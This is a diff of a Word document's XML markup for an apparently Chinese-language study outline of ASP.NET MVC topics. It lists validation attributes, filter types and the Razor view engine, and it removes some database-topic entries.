+        <w:t>System.ComponentModel.DataAnnotations.CustomValidationAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.DataTypeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.MaxLengthAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.MinLengthAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.RangeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.RegularExpressionAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.RequiredAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.StringLengthAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.Web.Security.MembershipPasswordAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Filter</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>IAuthenticationFilter(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>验证过滤器</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> MVC5)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>验证是否合理请求，是否合理用户</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>IAuthorizationFilter(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>授权过滤器</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>RequireHttpsAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ChildActionOnlyAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>IActionFilter(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>动作过滤器</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>前</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>后</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ActionFilterAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>IResultFilter(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>结果过滤器</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>前</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>后</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ActionFilterAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>IExceptionFilter(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>例外过滤器</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HandleErrorAttribute(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>FilterConfig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>就已被注册</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11863,19 +12957,35 @@
         <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
+          <w:numId w:val="18"/>
         </w:numPr>
         <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>数据库分库、拆表、分布式、集群、备份、故障调控等方案</w:t>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="02696D"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>RazorViewEngine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图引擎</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11883,945 +12993,24 @@
         <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
+          <w:numId w:val="18"/>
         </w:numPr>
         <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>数据库三大范式与反范式</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>RBAC</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Role-Based Access Control</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>，基于角色的访问控制）权限模型</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>数据库机制</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
         <w:rPr>
           <w:b/>
+          <w:color w:val="02696D"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:b/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>索引</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
